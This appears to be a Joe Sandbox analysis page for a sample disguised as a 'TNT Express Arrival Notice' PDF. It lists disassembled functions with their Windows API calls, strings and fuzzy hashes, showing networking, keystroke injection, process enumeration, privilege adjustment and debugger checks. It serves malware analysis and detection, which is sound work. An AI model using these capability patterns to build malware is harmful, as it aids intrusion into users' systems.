Instruction ID: 2c3b42d9ad1056c7057d07b35bc533d1d3e47d7387c1dc13d110262630fa3bc3
Opcode Fuzzy Hash: 8b6430db5b364ca36d18a6432c9816dc4a7f5d0456ffacd1df135eae459f2f4c
Instruction Fuzzy Hash: 41A13871208529BEE724EA7D8C48EBB6BADFB82354F15030BF482C67D1DA259D41D372

Function 00941806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0094304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0094307A
Part of subcall function 0094304E: _wcslen.LIBCMT ref: 0094309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0094185D
WSAGetLastError.WSOCK32 ref: 00941884
bind.WSOCK32(00000000,?,00000010), ref: 009418DB
WSAGetLastError.WSOCK32 ref: 009418E6
closesocket.WSOCK32(00000000), ref: 00941915

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 0ddbb89c0e4f3036d16deffab3a0dc86c16ebe34079790f11712e09843ea8509
Instruction ID: 1889cd790595141365d356174016e8c490b3a623778a92bd1ca69e9a5b4f6c4f
Opcode Fuzzy Hash: 0ddbb89c0e4f3036d16deffab3a0dc86c16ebe34079790f11712e09843ea8509
Instruction Fuzzy Hash: 21519375A00210AFDB10AF28C886F6A77E5EB44718F18855CF9069F3D3DB71ED418BA2

Function 00951C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00951CC0
IsWindowEnabled.USER32 ref: 00951CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00951CDB
IsIconic.USER32 ref: 00951CE9
IsZoomed.USER32 ref: 00951CF7

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 9f3fc409a925221104123a5c1fbcbb24e20658d2c9cb82bdf1600828f156260b
Instruction ID: f4b6b95d06005f15acfe465b7dcc1a03220379cf809476004f7534025bc3e9ab
Opcode Fuzzy Hash: 9f3fc409a925221104123a5c1fbcbb24e20658d2c9cb82bdf1600828f156260b
Instruction Fuzzy Hash: 2B2180717452115FD720CF1BC884F6A7BA9EF95316B19805CEC8A8B351DB72EC46CB90

Function 008C8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00905DF0
VUUU, xrefs: 008C843C
VUUU, xrefs: 008C83FA
VUUU, xrefs: 008C83E8
ERCP, xrefs: 008C813C

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: e520c8244956950ee8e4d9b9eb24e534708677d1c2db68611e732990f18cb912
Instruction ID: 1d237b7ffac18373ad07d6deda0f46f0f5f1c5d93e99a5758367037e39c536cf
Opcode Fuzzy Hash: e520c8244956950ee8e4d9b9eb24e534708677d1c2db68611e732990f18cb912
Instruction Fuzzy Hash: 72A25770A4021ACFDF248F58C844BAEB7B5FB54314F2581AAE815EB285EB74DD91CF90

Function 0094A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0094A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0094A6BA

Part of subcall function 008C9CB3: _wcslen.LIBCMT ref: 008C9CBD

Process32NextW.KERNEL32(00000000,?), ref: 0094A79C
CloseHandle.KERNEL32(00000000), ref: 0094A7AB

Part of subcall function 008DCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00903303,?), ref: 008DCE8A

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: a5161c7ba249dbb166a819528d5717fa31d31c631f95b12e8aca000f81cd36bd
Instruction ID: 5b247a80e7546fda5052a9d2924ed9b6082b0d0b23afa3606c385038df4c3bb5
Opcode Fuzzy Hash: a5161c7ba249dbb166a819528d5717fa31d31c631f95b12e8aca000f81cd36bd
Instruction Fuzzy Hash: 1D51E5B1508300AFD710EF29D886E6ABBE8FF89754F40492DF595D7251EB70E904CB92

Function 0092AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0092AAAC
SetKeyboardState.USER32(00000080), ref: 0092AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0092AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0092AB88

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 1b9c21ffff2193d3f22726dff89a514e806c496807ed1ee4e4478a10a3622230
Instruction ID: d70fb455212cbf760e59433eb144d6c2a128836ceebbec3cdd8cbf2a783c15ff
Opcode Fuzzy Hash: 1b9c21ffff2193d3f22726dff89a514e806c496807ed1ee4e4478a10a3622230
Instruction Fuzzy Hash: 5E312C72A40328AFFF35CB65EC05BFA77AAAF94310F04421BF181561D8D3758985D792

Function 0093CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0093CE89
GetLastError.KERNEL32(?,00000000), ref: 0093CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 0093CEFE

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 85a7fbf97ca511066f430aeeb68f94f700e7845b9f83105eae49d5bccb75a691
Instruction ID: 2d4b59190781ba644155169fbb31406fec2d001f792a70fc7b98b440ddc1dabf
Opcode Fuzzy Hash: 85a7fbf97ca511066f430aeeb68f94f700e7845b9f83105eae49d5bccb75a691
Instruction Fuzzy Hash: 2721A9B1504B05AFEB309FA6C988BAAB7FCEB40319F10481AE546E2151E774EE049F60

Function 00928298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 009282AA

Strings

(, xrefs: 009282F0
|, xrefs: 009282DA

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: d6bf8ae27d7d4127390a0167b6f0c51f726263cbf7a83f12aa47f80ed4bc5748
Instruction ID: c06c7bc932f8cfcb163588a36212a3fa483dea6de997a34d51557f5f120285ff
Opcode Fuzzy Hash: d6bf8ae27d7d4127390a0167b6f0c51f726263cbf7a83f12aa47f80ed4bc5748
Instruction Fuzzy Hash: 67323474A017159FCB28CF19D480AAAB7F0FF48710B15C56EE49ADB7A5EB70E981CB40

Function 00935C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00935CC1
FindNextFileW.KERNEL32(00000000,?), ref: 00935D17
FindClose.KERNEL32(?), ref: 00935D5F

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: f0f96d640f6b49db48c09e0edc67523ac686e2c79e2e94f81fb89ab6eafe49d9
Instruction ID: 99f8b63cdf0259fe2e28f1c2ff3d0c82a8813933f0de3c400dbaf927bb557492
Opcode Fuzzy Hash: f0f96d640f6b49db48c09e0edc67523ac686e2c79e2e94f81fb89ab6eafe49d9
Instruction Fuzzy Hash: 0D516674604A019FC714DF28C494E9AB7E8FF49324F15855EE9AA8B3A2DB30ED05CF91

Function 008F2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 008F271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 008F2724
UnhandledExceptionFilter.KERNEL32(?), ref: 008F2731

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 3cfd43dbd29396196b39350565ce189a189c4f4009f749bca3d8629c3420f0ee
Instruction ID: ed25d5bbbc4a0d9426ff828867adffc5a159c6fee481d87dd0ec8ff3d290dbfd
Opcode Fuzzy Hash: 3cfd43dbd29396196b39350565ce189a189c4f4009f749bca3d8629c3420f0ee
Instruction Fuzzy Hash: 9C31B47491132C9BCB21DF69DC89799B7B8FF18310F5041EAE41CA6261E7749F818F45

Function 009351CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009351DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00935238
SetErrorMode.KERNEL32(00000000), ref: 009352A1

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: f82d3f065bdb145016ace08fd53bd416e41a8236f9075ed561c3956f288b1390
Instruction ID: 522bcc274ddda30271172f5a06c1693bcfea089c30150aa56f3cb36ec6168848
Opcode Fuzzy Hash: f82d3f065bdb145016ace08fd53bd416e41a8236f9075ed561c3956f288b1390
Instruction Fuzzy Hash: 71318E75A10618DFDB00DF54D884FAEBBB4FF48314F058099E809AB362CB31E856CB91

Function 009216C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 008DFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 008E0668
Part of subcall function 008DFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 008E0685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0092170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0092173A
GetLastError.KERNEL32 ref: 0092174A

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 311cadd4a989ff91ec741c75cc04f4c552c11c419bfe439073cdf41b33b949e5
Instruction ID: 9f345569a23f8805d3e82d76b8e8254454f061cc8abd1446519e78162e6e119d
Opcode Fuzzy Hash: 311cadd4a989ff91ec741c75cc04f4c552c11c419bfe439073cdf41b33b949e5
Instruction Fuzzy Hash: 971191B2414305AFD718AF64EC86D6BB7BDFB44765B20852EE05697241EB70BC518B20

Function 0092D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0092D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0092D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0092D650

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: d0b0122daf2165e97ff56845b2028274ecbd7f8f8878ef8445fd392def45c91a
Instruction ID: 06eb61fc64e5fcf51417de007e3341d2e8e6dfd335d316c4e5d887bd6a357284
Opcode Fuzzy Hash: d0b0122daf2165e97ff56845b2028274ecbd7f8f8878ef8445fd392def45c91a
Instruction Fuzzy Hash: 6D117CB1E05328BFDB108F95AC44FAFBBBCEB45B50F108111F914E7294C2704A018BA1

Function 00921663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0092168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 009216A1
FreeSid.ADVAPI32(?), ref: 009216B1

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 9919ba94cb0faa945aca1d06144295e8b532bc1c882b4df6ada14a3cb0de9ab6
Instruction ID: 6a6a9ea9c3112c56409d25e96551af9b578ab63959958f913ffc9aa6ee960378
Opcode Fuzzy Hash: 9919ba94cb0faa945aca1d06144295e8b532bc1c882b4df6ada14a3cb0de9ab6
Instruction Fuzzy Hash: A3F0F4B1950309FFDF00DFF59C89AAEBBBCEB08605F504565E501E2181E774AA449B50

Function 008E4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(008F28E9,?,008E4CBE,008F28E9,009888B8,0000000C,008E4E15,008F28E9,00000002,00000000,?,008F28E9), ref: 008E4D09
TerminateProcess.KERNEL32(00000000,?,008E4CBE,008F28E9,009888B8,0000000C,008E4E15,008F28E9,00000002,00000000,?,008F28E9), ref: 008E4D10
ExitProcess.KERNEL32 ref: 008E4D22

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 0690cf98a212d6980a6366be09afde649bd4d97b64e7975a7b4e7b860dbe0c59
Instruction ID: 642ab2cad73e9743ea45a87f22898a979688858eadf3089a46870ec02beee5d6
Opcode Fuzzy Hash: 0690cf98a212d6980a6366be09afde649bd4d97b64e7975a7b4e7b860dbe0c59
Instruction Fuzzy Hash: 6DE0B671114788AFCF11AF66DD09A583F69FF82782B104054FD19CA223CB35DD42EB80

Function 008FC2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 008FC36C

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 3f38f43ec9565ca4bcdae5e7bcea030a0b5d72c0ed49af6adf350b7e15360d38
Instruction ID: d0a4a1f998553c3088d25abdc87383f60bddc0c1590d671f126f8e17303552c1
Opcode Fuzzy Hash: 3f38f43ec9565ca4bcdae5e7bcea030a0b5d72c0ed49af6adf350b7e15360d38
Instruction Fuzzy Hash: D841397290021DAFCB209FB9DD49EBB77B8FB84354F104269FA05D7280E6719E81CB50

Function 0091D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0091D28C

Strings

X64, xrefs: 0091D2A8

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 173b75f651e22bd87e3ccec5928c300dda5a49ebb49637d1a7682de451de8019
Instruction ID: 487582a74ddd33bdf074242b5763b7bb83852ab82163f1415688b0f0aea650ef
Opcode Fuzzy Hash: 173b75f651e22bd87e3ccec5928c300dda5a49ebb49637d1a7682de451de8019
Instruction Fuzzy Hash: 23D0C9B581521DEECF90CBA0DC88DDDB3BCFB04305F100652F106E2140D77495489F10

Function 008ECAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: a3f5fef9f97d259f2b6e99acf7b7dc0df58f6bf6ec66c16d26b6bcb02d6dfec0
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: A7021D71E002599FDF14CFA9C8806ADFBF1FF89314F254169E919E7384D731A9428B94

Function 009368EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00936918
FindClose.KERNEL32(00000000), ref: 00936961

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: d891290c4fe8516d6dc3f7f8f9200a6fdf370f1c3a78f1ec9050cdb1e4ee0936
Instruction ID: bbd2b47e133a7723fa73a7df37609f0bdd5740c30ca7f1a7d460e2b9b203d81e
